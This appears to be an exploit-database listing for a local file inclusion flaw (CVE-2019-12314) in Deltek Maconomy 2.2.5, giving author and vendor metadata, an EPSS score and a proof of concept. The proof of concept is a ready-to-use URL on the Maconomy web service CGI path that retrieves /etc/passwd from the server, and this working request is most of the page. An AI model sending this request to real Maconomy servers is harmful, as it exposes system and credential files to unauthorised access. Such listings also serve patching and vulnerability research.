Lucene search

K
exploitpackJameelNabboEXPLOITPACK:90A2E761632F0D07A5D602D84CC83176
HistoryMay 27, 2019 - 12:00 a.m.

Deltek Maconomy 2.2.5 - Local File Inclusion

2019-05-2700:00:00
JameelNabbo
14

EPSS

0.089

Percentile

94.6%

Deltek Maconomy 2.2.5 - Local File Inclusion

# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

EPSS

0.089

Percentile

94.6%

Related for EXPLOITPACK:90A2E761632F0D07A5D602D84CC83176